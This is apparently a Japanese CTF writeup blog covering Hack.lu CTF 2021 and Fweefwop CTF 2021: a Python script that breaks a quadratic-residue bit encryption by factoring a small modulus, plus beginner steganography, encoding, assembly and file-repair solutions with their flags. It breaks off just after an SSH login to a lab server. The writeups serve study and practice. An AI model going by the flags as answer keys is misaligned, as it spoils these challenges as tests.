Hack.lu CTF 2021 Writeup

この大会は2021/10/30 3:00(JST)~2021/11/1 3:00(JST)に開催されました。
今回もチームで参戦。結果は146点で174チーム中119位でした。
自分で解けた問題をWriteupとして書いておきます。

Silver Water Industries (crypto)

サーバの処理概要は以下の通り。

・p: 4で割って1余る素数
・q: 4で割って3余る素数
・N = p * q
・token: ランダム20バイト文字列
・N表示
・tokenの各文字で暗号化をして表示
 ・encryptByte(uint8(b), N)
  ・各bitを取り出し、以下を実行
   ・x: ランダムN未満整数
   ・x = pow(x, 2, N)
   ・bitが1の場合、以下を実行
    ・x = x * -1 % N
  ・xが各bitの暗号結果
・tokenを入力し、当てたらフラグが表示される。

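Nは128ビット程度と小さく素因数分解できるので、qを法とするルジャンドル記号(オイラーの規準)で各暗号値が平方剰余かどうかを判定する。q ≡ 3 (mod 4)では-1が平方非剰余になるため、x^2は平方剰余(bit 0)、-x^2は平方非剰余(bit 1)となる。これを使ってbitを構成し、tokenを求める。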

import socket
import primefac

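def recvuntil(s, tail):
    """Read from socket *s* one unit at a time until *tail* has been seen.

    Returns everything received so far, including *tail*.

    Raises:
        EOFError: if the peer closes the connection before *tail* arrives.
    """
    data = ''
    while tail not in data:
        chunk = s.recv(1)
        if not chunk:
            # recv() returns an empty value once the peer has closed the
            # connection; without this check the loop would spin forever.
            raise EOFError('connection closed before %r was received' % (tail,))
        data += chunk
    return data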

def legendre(a, p):
    """Evaluate Euler's criterion: a ** ((p - 1) // 2) modulo p.

    For an odd prime p the result is 1 when a is a non-zero quadratic
    residue, p - 1 when it is a non-residue, and 0 when p divides a.
    """
    half_order = (p - 1) // 2
    return pow(a, half_order, p)

# NOTE: written for Python 2 -- recv() results are concatenated with str.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('flu.xxx', 20060))

# The first line sent by the server is the modulus N.
data = recvuntil(s, '\n').rstrip()
print(data)
N = int(data)

# Factor N, then name the factors so that q is the one not congruent to
# 1 mod 4. Assumes N has exactly two prime factors, one of each residue
# class -- the script does not verify this.
factors = list(primefac.primefac(N))
first = int(factors[0])
second = int(factors[1])
p, q = (first, second) if first % 4 == 1 else (second, first)

# Each of the 20 lines is a bracketed, space-separated list of ciphertexts,
# one per bit of a token character.
chars = []
for _ in range(20):
    data = recvuntil(s, '\n').rstrip()
    print(data)
    cs = [int(value) for value in data[1:-1].split(' ')]
    # A value that is a square mod q is an untouched x^2 (bit 0); anything
    # else is treated as the negated square (bit 1).
    bits = ''.join('0' if legendre(c, q) == 1 else '1' for c in cs)
    chars.append(chr(int(bits, 2)))
token = ''.join(chars)

print(token)
s.sendall(token + '\n')

# Echo the two lines the server sends back after the token is submitted.
for _ in range(2):
    data = recvuntil(s, '\n').rstrip()
    print(data)

実行結果は以下の通り。

205201352501296706577599140901269118023
[15551150965336841481303694869076376235 31280307824210708974663470243763905866 29686532167500809255011608954026372858 106309129038325740668553576547575722895 202531659368076325005653483089932408387 36899989699214318343493638727401747895 63095878593574183611076025132760595344 139603090508040346067839585710972344278]
[133511823929658508276605320930926599852 68586205733744541217165989652076854754 95125055626225880615545091125114396233 58406967620528760082049126513783953661 149803365505036756094383920414814034180 55337697109939807564346950612040780505 137524867405573002059152942916469074128 129714072386835569939954105066623406483]
[128649732687775885720385521607178838031 76204584633415310803161678896708350340 204786253625542731010067073941390579527 160304440720186755379605741827373000642 73115465943360493635501681281223039753 159650430042498768063614263507303096475 85361659488918561618080960678978331978 123456508766250080643937363353522254593]
[98425794902769757596716306639794966788 92174663485868637274383535623840358573 75818285289244849967541025638562962176 180289210331278907132862285537725229365 164776478841649708171768154006703309546 196898475808670431539757322983047172971 148808528938083105592657924913417458857 120121982460640324634782225223471183892]
[115056394227165395945251281863618542959 75122527388613039270230125442823485697 117034480692333340306908298750547182987 1438843669871314472396152833444486852 142803248690470930825313585552584556160 91234879379394171868749588702961652271 77412719608943537094763387646810099914 89156390846956305088860301084043650512]
[86192829635697200577218087522899943459 129586423689102613522357277789515638279 155815667661835675814818301461770227888 10212485135984014220307068963077651384 42740615256728263789280142476464602132 7819911283038414646998817462881739972 173779491342105988175201259938793272308 104884949494215628951062126653855559326]
[23457085896895845707206998523185162382 5259437546149171221102572201142630435 185240734713383466650798228124258331001 185955037187995129859497733288068407433 65340204326777479200320970493255444515 72368707321429810047977140074735777164 130475328722169242267617517251537045859 155860175925187117502416307195294074913]
[167333881284315974076689229507936292849 80967121439621246958868367811702953631 129782445878924195241138753525421371721 94541685485544767842606502263635963916 177887553330868767090172627293472689277 146195016766634146570076290040841897575 94228282252782373260284019275845673627 165894835442458505682232521757664908596]
[27627079191803081189498795874627868748 92750378963906147943981362484287300563 131539828540776851482888319039364260983 156297277982273389436032005817584491748 187940581833148381157688334100610426088 69619406525610122532016909182657515854 197014005833487535828398767242650189476 103727650931880287581778336091578488268]
[93359695352067960497958687805523252317 130256350313027598032765038156173064299 182511755067475677810022439401644709497 172720643848505738997457792316018466526 111737541180623808942756845878561402792 114233851666580025244497001560190154445 70535956066086395009129943025469992621 117624415448786377850230056200647559317]
[92285594805332770709094052943031340274 195278675997794609545719313718490751144 66290220940291796682502496143968489379 74582188356191533084742131163342201764 162322236492596447076935974648303224105 122520490762427824874611262823154423125 80342655063526134071906544720414361460 62962578858339846261489550596447930224]
[75038194159941741829719056722047315640 142896132478711771987714869142021478121 121385825808562058103172682192188110478 160822770320337466430249041498628888952 101551593114175050638697193369680021327 138452480906735836204678964256515125740 178242975807969656190357744983715424471 189235561802013679222822581501905164084]
[29208023268952078758314169734331828302 31575796165648827278123934950635425369 129717598372873687829838818378652097018 72627448123432734061519333165084761076 92566789171206206963466118419173482198 140667507776942907234366607998372615819 72045512926442515077667246509030650847 127487924694539321892066736533453851331]
[124160668065795792776067267796896140899 167349962518637938933418758267177534982 113022889506344406365921634984737164844 60649217807726994468712511333963761081 142176351095809333381984017409458561727 100614657831085302527950065195982582902 109657192238613782412584622675817063983 113594650128438423930448472045220085063]
[12624223549004718866784263005147337707 57947195513931203527325943649357945563 27785896821585777774703269039420417306 84698745598981229057306235174243849761 186874597158155713602425267782282008365 159570925999583130335192156674460454845 74976884768597269206124131205506238750 41210158849268768204793917833611736588]
[97435289611410296911178284306527121688 204617103647324192868935876796294159980 80713346298216454647242300111524682952 144361211534468840160576871421355114370 112705443200226417328449002988365186669 9708913692045139739751848467961427225 180144691200330557034140944683713229003 118077983370592709058056959092434914275]
[81349280591429048964841772453198844388 143461533563614820049749141592051885544 17014264063427099447758762678696473142 83752614307257667896895499684774264028 76832960558236829260557562405949352064 66378954906348076753462545555373133579 158644768414361930508332021019700454518 8054683295619130495371596062911939218]
[47728993412305131451931502291552250872 23565345831842523792160044844958492728 96832534655723584168028624329294189834 61901281902075663285491389728930083533 7197696702122637803381123097795861279 113755545563597210552227528438270615155 131204445269445780037258391301346873280 94068747071933819507007583789271536414]
[125552728026235392096233188470748995165 204768855308703680830869863325240086846 102353228058667708035709878745447703302 154851188131576658808473706129586246164 148049793750982061245696908183859447400 39875326904411423450657949118317447750 26823906622662091318638055988729177746 49113285052080237590860162332963904668]
[185614492613659480830200228605006121522 49858624092147477156687742141026495328 14111466418951255666353671900770556827 49246480288598949383181909942870603640 148596901330661963565901746277303701137 204950093608505889253830145585012363982 21406548080121661018862741467018894407 82738943507387042533755879283809695674]
OVGWrpcU4xXvQ8PA7GeO

flag{Oh_NO_aT_LEast_mY_AlGORithM_is_ExpanDiNg}
flag{Oh_NO_aT_LEast_mY_AlGORithM_is_ExpanDiNg}

Fweefwop CTF 2021 Writeup

この大会は2021/10/23 9:00(JST)~2021/11/1 0:00(JST)に開催されました。
今回もチームで参戦!といっても実質1人チームでした。
結果は29900点の満点で386チーム中4位でした。
自分で解けた問題をWriteupとして書いておきます。

Warm Up -- Let's Start! (General 100)

問題にフラグが書いてあった。

fwopCTF{this_is_the_flag}

Base2 (General 100)

2進数にする問題。

>>> bin(0xe8)[2:]
'11101000'
11101000

Base64 Abridged (General 100)

base64エンコードする問題。

$ echo -n "I love CTF" | base64
SSBsb3ZlIENURg==
SSBsb3ZlIENURg==

Touch the base (General 100)

base64デコードする問題。

$ echo ZndvcENURntiYXNlNjRfaXNfZXZlcnl3aGVyZX0= | base64 -d
fwopCTF{base64_is_everywhere}
fwopCTF{base64_is_everywhere}

Hex the way in (General 100)

ASCIIコードの16進数表記をデコードする問題。

>>> s = '66 77 6f 70 43 54 46 7b 62 61 63 6b 5f 66 72 6f 6d 5f 68 65 78 7d'
>>> s.replace(' ', '').decode('hex')
'fwopCTF{back_from_hex}'
fwopCTF{back_from_hex}

Zeros and Ones (General 100)

2進数をASCIIコードとしてデコードする。

enc = '01100110 01110111 01101111 01110000 01000011 01010100 01000110 01111011 01100011 01101111 01101101 01110000 01101100 01101001 01100011 01100001 01110100 01100101 01100100 01111101'

# Every space-separated group is read as one base-2 character code.
groups = enc.split(' ')
flag = ''.join(chr(int(group, 2)) for group in groups)
print(flag)
fwopCTF{complicated}

Assembly Warm Up (General 100)

symbolic machine code と呼ばれる言語を答える問題。

Assembly

Jon Us in Discord (General 100)

Discordに入り、#generalチャネルのトピックを見ると、フラグが書いてあった。

fwopCTF{fweefwop_ctf_go_go_go}

Name this language(0) (General 150)

以下のプログラム言語を答える問題。

#include <stdio.h>
int main() {
   printf("Hello, World!");
   return 0;
}
C

Name this language (1) (General 150)

以下のプログラム言語を答える問題。

fn main() {
  println!("Hello World!");
}
rust

Name this language (2) (General 150)

以下のプログラム言語を答える問題。

package main
import "fmt"
func main() {
  fmt.Println("hello world")
}
go

Name this language (3) (General 150)

以下のプログラム言語を答える問題。

PROGRAM Triangle
 IMPLICIT NONE
 REAL :: a, b, c, Area
 PRINT *, 'Welcome, please enter the&
          &lengths of the 3 sides.'
 READ *, a, b, c
 PRINT *, 'Triangle''s area:  ', Area(a,b,c)
END PROGRAM Triangle
FUNCTION Area(x,y,z)
 IMPLICIT NONE
 REAL :: Area            ! function type
 REAL, INTENT( IN ) :: x, y, z
 REAL :: theta, height
 theta = ACOS((x**2+y**2-z**2)/(2.0*x*y))
 height = x*SIN(theta); Area = 0.5*y*height
END FUNCTION Area
Fortran

Name this language (4) (General 150)

以下のプログラム言語を答える問題。

IDENTIFICATION DIVISION.
PROGRAM-ID.  FweefwopProgram.

PROCEDURE DIVISION.
DisplayPrompt.
DISPLAY "Fweefwop Wins!".
STOP RUN.
COBOL

Name this language (5) (General 150)

以下のプログラム言語を答える問題。

(defun fibonacci(n)
  (cond
    ((eq n 1) 0)
    ((eq n 2) 1)
    ((+ (fibonacci (- n 1)) (fibonacci (- n 2))))))))
lisp

Name this language (6) (General 100)

以下のプログラム言語を答える問題。

10 LET N=10
	20 FOR I=1 TO N
	30 PRINT "FweeFwop is FweeFwoping"
	40 NEXT I
BASIC

Name this language (7) (General 150)

以下のプログラム言語を答える問題。

size([],0).
size([H|T],N) :- size(T,N1), N is N1+1.
Prolog

Name this language (8) (General 150)

以下のプログラム言語を答える問題。

let sv (h:t) = p : sv (filter (\x -> x `mod` h /= 0) t) in sv [2..]
Haskell

What's that thing? (0) (General 150)

人間が読めるプログラムを実行可能なマシンコードに変換するのは何かという問題。

compiler

What's that thing? (1) (General 150)

プロセスの一種で、長い間とどまる傾向があり、通常自分では消えない。またsshでドアをノックすると、ドアに応答するということがあるようなものは何かという問題。

daemon

What's that thing? (2) (General 150)

ルーターはレイヤー3で機能し、IPアドレスを処理するが、レイヤー2で動作し、Macアドレスを処理するものは何かという問題。

Switch

What is that thing? (3) (General 150)

無効にすると、pingは機能しないものをフルネーム(4ワード)で答える問題。

Internet Control Message Protocol

Assembly: MOV and ADD (General 150)

mov eax, 0x0902F
add eax, 0x00138

上記のコード実行後、EAXの値を10進数で答える問題。

>>> 0x0902F + 0x00138
37223
37223

MOV again (General 150)

mov eax, 0x1111
mov ebx, 0x2222
mov eax, ebx

上記のコード実行後、EBXの値を10進数で答える問題。

>>> 0x2222
8738
8738

Shift (General 150)

mov eax, 0x123
shr eax, 4
shl eax, 8

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。

>>> eax = 0x123
>>> eax >>= 4
>>> eax <<= 8
>>> hex(eax)
'0x1200'
0x1200

Assembly: Reset a register (General 150)

??? rax, rax

レジスタraxをリセット(値を0に設定)することができる演算子を答える問題。

xor

Assembly: Stack (1) (General 150)

mov eax, 0x123
mov ebx, 0x321
push eax
add eax, 0x111
mov ebx, eax
pop ebx

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。
最終的にpushしたeaxの値をpopしている。

0x123

Assembly: Stack (2) (General 150)

mov eax, 0x123
mov ebx, 0x321
push eax
push ebx
pop eax
pop ebx

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。
eaxとebxに格納した値が入れ替わっている。

0x123

XOR warm up (General 200)

すべての文字を\x01とXORする。

enc = 'gvnqBUGzyns^stmdr|'

# XOR with 1 flips only the lowest bit of each character code.
flag = ''.join(chr(ord(ch) ^ 1) for ch in enc)
print(flag)
fwopCTF{xor_rules}

Modular (0) (General 200)

そのまま計算するだけ。

>>> 3 * 6 % 7
4
4

Modular (1) (General 200)

inverseを使って剰余環上の割り算をする。

from Crypto.Util.number import *

# Dividing by 11 modulo 59 means multiplying by the modular inverse of 11.
inv_11 = inverse(11, 59)
ans = 46 * inv_11 % 59
print(ans)
3

Modular (2) (General 200)

modulusの数値が小さいので、ブルートフォースする。

p = 607
# The modulus is tiny, so every residue can be tried. Only the smallest x
# with x^2 = 2 (mod p) is printed; nothing is printed if none exists.
candidates = (x for x in range(p) if pow(x, 2, p) == 2)
x = next(candidates, None)
if x is not None:
    print(x)
194

Modular Math (3) (General 150)

ブルートフォースで求める。

# Search for the smallest positive exponent with 5^exponent = 1 (mod 7001),
# trying exponents 1..7000 in order.
modulus = 7001
exponent = 1
while exponent <= 7000 and pow(5, exponent, modulus) != 1:
    exponent += 1
if exponent <= 7000:
    print(exponent)
3500

Modular Math (4) (General 400)

m = 31, 
e = 2813771283
n = 384302

とする。

pow(m, pow(m, e)) % n
= pow(m, pow(m, e, phi), n)

n = 384302 = 2 * 17 * 89 * 127
phi = 1 * 16 * 88 * 126

mとnは互いに素(gcd(31, 384302) = 1)なので、オイラーの定理により指数をphiを法として還元できる。以上のことから計算する。

m, e, n = 31, 2813771283, 384302

# n = 2 * 17 * 89 * 127 is square-free, so phi(n) is the product of
# (prime - 1) over its prime factors.
phi = (2 - 1) * (17 - 1) * (89 - 1) * (127 - 1)

# gcd(m, n) = 1, so the huge exponent m**e may be reduced modulo phi(n)
# before the outer exponentiation.
inner = pow(m, e, phi)
ans = pow(m, inner, n)
print(ans)
278505

NASM (1) (General 250)

asmファイルが添付されている。

$ nasm -f elf64 hello.asm -o hello.o
$ ld -m elf_x86_64 hello.o -o hello
$ ./hello
fwopCTF{i_have_done_this_ex}
fwopCTF{i_have_done_this_ex}

NASM (2) (General 200)

NASM (1)の問題のasmファイルを1文字修正して、"fwopCTF{i_have_done_this_exercise}"と出力されるようにするには、何に修正するかを答える問題。
以下の部分の0x13がdbから切り出すサイズ。

                :

          mov       rax, 1                  ; system call for write
          mov       rdi, 1                  ; file handle 1 is stdout
          mov       rsi, message            ; address of string to output
          mov       rdx, 0x13               ; number of bytes
          syscall                           ; invoke operating system to do the write

                :

message:  db        "i_have_done_this_exercise_i_swear_but_who_knows" 

0x13を0x19にすればよい。

9

Go through some gates (General 300)

f:id:satou-y:20211103231618p:plain
A, B, Cが1の場合、Sの値は何になるかを答える問題。
左上のXORで0、次のXORで1になり、Sは1になる。

1

Assembly: Jump (General 400)

asmファイルが添付されているが、バグがある。asmファイルの以下の箇所を修正してコンパイルする。

■_startの識別子を一致させる。

1行目
global    start
    ↓
global    _start

■出力バイト数を13にする

33行目
        mov       edx, 0x0?               ; number of bytes
    ↓
        mov       edx, 0x0d               ; number of bytes
$ nasm -f elf64 jump.asm -o jump.o
$ ld -m elf_x86_64 jump.o -o jump
$ ./jump
fwopCTF{fwop}
fwopCTF{fwop}

Alice in Wonderland? (Forensics 100)

$ strings garden.jpg | grep fwop
Here is a flag "fwopCTF{Beneath_the_surface}".
fwopCTF{Beneath_the_surface}

Just inflate me (Forensics 100)

$ gzip -dc flag.txt.gz 
fwopCTF{ok_you_found_me}
fwopCTF{ok_you_found_me}

The Meta Joke (Forensics 100)

$ exiftool MyCoolCard.jpg | grep fwop
Image Description               : fwopCTF{metadata_is_funky}
fwopCTF{metadata_is_funky}

Not Viewable (Forensics 100)

$ file fflag.txt 
fflag.txt: PNG image data, 405 x 38, 8-bit/color RGBA, non-interlaced
$ mv fflag.txt flag.png

pngとして画像を開く。
f:id:satou-y:20211104080648p:plain

fwopCTF{actually_an_image}

Reading between the Eyes (Forensics 150)

$ zsteg Husky.png 
b1,r,lsb,xy         .. text: "7U>c[rvyzrfM\""
b1,rgb,lsb,xy       .. text: "fwopCTF{r34d1ng_b37w33n_7h3_by73s}/"
b1,abgr,msb,xy      .. text: "[U[wwyUU"
b3,b,lsb,xy         .. text: "?rc%Gw'["
b3,rgb,lsb,xy       .. file: PGP\011Secret Key -
b3,rgba,lsb,xy      .. file: PGP\011Secret Key -
b4,r,lsb,xy         .. text: "wxfveD#0"
b4,g,lsb,xy         .. text: "TETETffx"
b4,b,lsb,xy         .. text: "fwvB34\"TC "
b4,rgba,lsb,xy      .. text: "O`/`/q_`O`O_?N/N"
fwopCTF{r34d1ng_b37w33n_7h3_by73s}

Not the same (Forensics 150)

2つのテキストファイルが与えられている。似て非なるものなので、差分をとる。

$ diff t1.txt t2.txt 
122c122
< f
---
> .
583c583
< w
---
> .
651c651
< o
---
> .
2192c2192
< p
---
> .
2559c2559
< C
---
> .
2758c2758
< T
---
> .
2768c2768
< F
---
> .
2898c2898
< {
---
> .
3650c3650
< r
---
> .
3703c3703
< 3
---
> .
3891c3891
< s
---
> .
4089c4089
< p
---
> .
4297c4297
< 3
---
> .
4304c4304
< c
---
> .
4341c4341
< t
---
> .
4599c4599
< _
---
> .
5314c5314
< t
---
> .
7154c7154
< h
---
> .
8006c8006
< 3
---
> .
8048c8048
< _
---
> .
8110c8110
< d
---
> .
8390c8390
< 1
---
> .
8398c8398
< f
---
> .
8499c8499
< f
---
> .
9002c9002
< }
---
> .
fwopCTF{r3sp3ct_th3_d1ff}

Sharper Image (Forensics 150)

base64のデータが添付されているが、jpgのものと推測できる。このデータをデコードしてみる。

# Python 2 only: str.decode('base64') does not exist on Python 3 strings.
with open('bb.txt', 'r') as src:
    encoded = src.read()

# Write the decoded bytes out in binary mode so the image is not altered.
with open('flag.jpg', 'wb') as dst:
    dst.write(encoded.decode('base64'))

f:id:satou-y:20211104081044j:plain
デコードした画像を見てみると、フラグが書いてあった。

fwopCTF{this_is_a_boring_flag}

What's inside of this apple? (Forensics 200)

Stegsolveで開き、[Analyse]-[Data Extract]でRGBのLSBを抽出すると、別のPNGが抽出できる。
f:id:satou-y:20211104081158p:plain
この画像にフラグが書いてあった。

fwopCTF{apple_core_of_course}

Follow the Shiba (Forensics 200)

$ zsteg shiba_with_message.png 
b1,rgb,lsb,xy       .. text: "No flag here, but you can check out https://imgur.com/gallery/jCJcbzZ  "
b2,r,msb,xy         .. text: "WUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,g,msb,xy         .. text: ["U" repeated 209 times]
b2,b,lsb,xy         .. text: "ADPUPQ@QP"
b2,abgr,msb,xy      .. text: "[{s[SSsSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
b4,r,msb,xy         .. text: ["w" repeated 165 times]
b4,g,lsb,xy         .. text: "wgvfvgvfvwffvwffggfgvwvfwwvvfgffwgfgwgvgwwfgvwvfwgvvvgfwgwvfwwvvvgvgwwvgvwffwgvwwwvgvvfgvgfwfgffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
b4,g,msb,xy         .. text: ["f" repeated 162 times]
b4,b,lsb,xy         .. text: "EDTDUDEEUDETUEUEUDEDUEDDTDUETDUEUDEETDEETDEUUEDDTEEDTETTUDUUUDUETDUEUDDUUDETUDEDTDUTDDUETEUTTDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
b4,b,msb,xy         .. text: "**\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""

https://imgur.com/gallery/jCJcbzZにアクセスし、画像をダウンロードする。この画像に対してzstegで確認してみる。

$ zsteg undefined\ -\ Imgur.png 
b1,rgb,lsb,xy       .. text: "here is the flag fwopCTF{steg_is_fun}"
b2,r,msb,xy         .. text: "]UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,g,msb,xy         .. text: ["U" repeated 231 times]
b2,b,msb,xy         .. text: "}_UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,rgb,msb,xy       .. text: ["U" repeated 182 times]
b2,bgr,msb,xy       .. text: ["U" repeated 182 times]
b2,abgr,msb,xy      .. text: "wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW"
b3,bgr,msb,xy       .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3,abgr,msb,xy      .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural
b4,r,msb,xy         .. text: ["w" repeated 207 times]
b4,g,msb,xy         .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural
b4,b,msb,xy         .. text: ["w" repeated 207 times]
b4,rgb,msb,xy       .. text: ["w" repeated 108 times]
b4,bgr,msb,xy       .. text: ["w" repeated 108 times]
fwopCTF{steg_is_fun}

Pranked (Forensics 200)

リダイレクトされるが、linkを「リンクのアドレスをコピー」すると、元々のURLがわかる。

https://tinyurl.com/easilypranked
fwopCTF{easilypranked}

What is in this Cookie? (Forensics 200)

$ zsteg download_3.png 
b1,r,lsb,xy         .. text: "?{w((((((((7U="
b1,g,lsb,xy         .. text: ["A" repeated 8 times]
b1,b,lsb,xy         .. text: "\n\n\n\n\n\n\n\n_"
b1,b,msb,xy         .. text: "APPPPPPPP"
b1,rgb,lsb,xy       .. text: "Where is the flag? It must be here somewhere.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nFwopCTF{ThisIsSoMuchFun}"
b1,rgb,msb,xy       .. text: "tPPPPPPPPPPPPPPPPPPPPPPPPb"
b2,b,msb,xy         .. text: "W!UwUsUwUw"
b2,bgr,msb,xy       .. text: "V75uQVWwuuA"
b2,abgr,msb,xy      .. text: ["S" repeated 8 times]
b3,rgba,lsb,xy      .. text: "?7sw3q?3s?"
b4,r,msb,xy         .. text: "UUUU3UUU"
b4,g,msb,xy         .. text: "wwwwwww7sww"
b4,b,msb,xy         .. text: ["w" repeated 9 times]
b4,rgb,msb,xy       .. text: "gy^gu^ouVo}1"
b4,bgr,msb,xy       .. text: "viW~e_~e_vm7q"
FwopCTF{ThisIsSoMuchFun}

Bitcoin Laundering (0) (Forensics 200)

jsonデータが添付されている。このデータからトランザクション数を答える。
"}," を"},\n"に置換すると、20000行のデータになった。

20000

Bitcoin Laundering (1) (Forensics 400)

アドレス16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYweが受け取ったBitcoinの総量を答える問題。
jsonデータとして読み込み、'dest_addr'が'16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYwe'で、'cryptocurrency'が'Bitcoin'になっている'quantity'の合計を計算する。

#!/usr/bin/env python3
import json

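with open('transactions.json') as f:
    transactions = json.load(f)

TARGET_ADDR = '16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYwe'

# Accumulate into `total` rather than `sum`, so the builtin sum() is not
# shadowed for the rest of the script.
# NOTE(review): quantities are added exactly as json parsed them (presumably
# floats), so the result carries binary floating-point rounding; pass
# parse_float=decimal.Decimal to json.load if exact amounts matter.
total = 0
for tx in transactions:
    to_target = tx['dest_addr'] == TARGET_ADDR
    if to_target and tx['cryptocurrency'] == 'Bitcoin':
        total += tx['quantity']

print(total)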
63382.93

Apples & Oranges (Forensics 250)

$ steghide extract -sf Apple.jpg -p oranges
wrote extracted data to "secret.txt".
$ cat secret.txt
fwopctf{which_is_your_favorite}
fwopctf{which_is_your_favorite}

Wood Door (Forensics 250)

Stegsolveで開き、Blue plane 2を見ると、フラグが現れた。
f:id:satou-y:20211104234550p:plain

fwopCTF{hiding_in_bit_plane}

Noise (Forensics 250)

Sonic Visualiserで開き、スペクトログラムを見る。
f:id:satou-y:20211104234654p:plain

FWOPY

Corrupted_File (Forensics 300)

pngヘッダが壊れているので、修正する。

89 24 00 32 -> 89 50 4e 47

ihdrの長さが間違っているので、修正する。

00 00 00 12 -> 00 00 00 0d

すると、修正した画像にフラグが書いてあった。
f:id:satou-y:20211104234824p:plain

fwopCTF{c0rrupted}

Smashed (Forensics 300)

たくさんデータがあるが、データの2個目をインデックスとすると、同じインデックスに対応する文字はすべて同じなので、インデックスの順に文字を並べる。

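import ast

with open('smashed.txt', 'r') as f:
    # smashed.txt is a challenge attachment, i.e. untrusted input. This
    # script originally called eval() here, which executes any expression
    # found in the file; ast.literal_eval() accepts only Python literals.
    data = ast.literal_eval(f.read().rstrip())

# Each entry is indexed as (character, position) -- presumably a list of
# pairs; verify against the attachment. Entries that repeat a position
# simply overwrite the slot, and a position of 256 or more raises IndexError.
m = [''] * 256
for d in data:
    m[d[1]] = d[0]

msg = ''.join(m)
print(msg)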

実行結果は以下の通り。

The Fweefwop CyberSecurity Team is honored to have you participate our first CTF.
 We sincerely hope you had fun and learned something useful. Oh! the flag is
 fwopCTF{kirby_is_the_best_in_super_smash_bros_change_my_mind}
fwopCTF{kirby_is_the_best_in_super_smash_bros_change_my_mind}

Song Naming (Forensics 300)

mp3が添付されているので、歌の名前と、アーティストの名前を答える問題。
https://www.aha-music.com/identify-songs-music-recognition-onlineで識別する。

Title: Shop
Artist: Toby Fox
fwopCTF{shoptobyfox}

Kevin zzZZ (Forensics 400)

$ binwalk kevin_zzZZ.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2227057       0x21FB71        PNG image, 1147 x 1147, 8-bit/color RGB, non-interlaced
2227116       0x21FBAC        Zlib compressed data, default compression
2308197       0x233865        JPEG image data, JFIF standard 1.01

$ foremost kevin_zzZZ.jpg 
Processing: kevin_zzZZ.jpg
|*|

f:id:satou-y:20211104235305p:plain
pngが抽出でき、その画像にはQRコードが書いてある。読み取ると、フラグが現れた。

fwopCTF{rick_fan_are_you_not?}

Linux Lab Level 1 (Linux 100)

$ ssh level0@linux.fweefwop.club
The authenticity of host 'linux.fweefwop.club (34.127.83.18)' can't be established.
ECDSA key fingerprint is SHA256:sm7uInZJMRlNFh5KAi4EP4tNjToVnp4HfK2+Qt4LHRM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'linux.fweefwop.club,34.127.83.18' (ECDSA) to the list of known hosts.
level0@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:01:37 2021 from 34.127.83.18
level0@fweefwoplinux:~$ ls -la
total 28
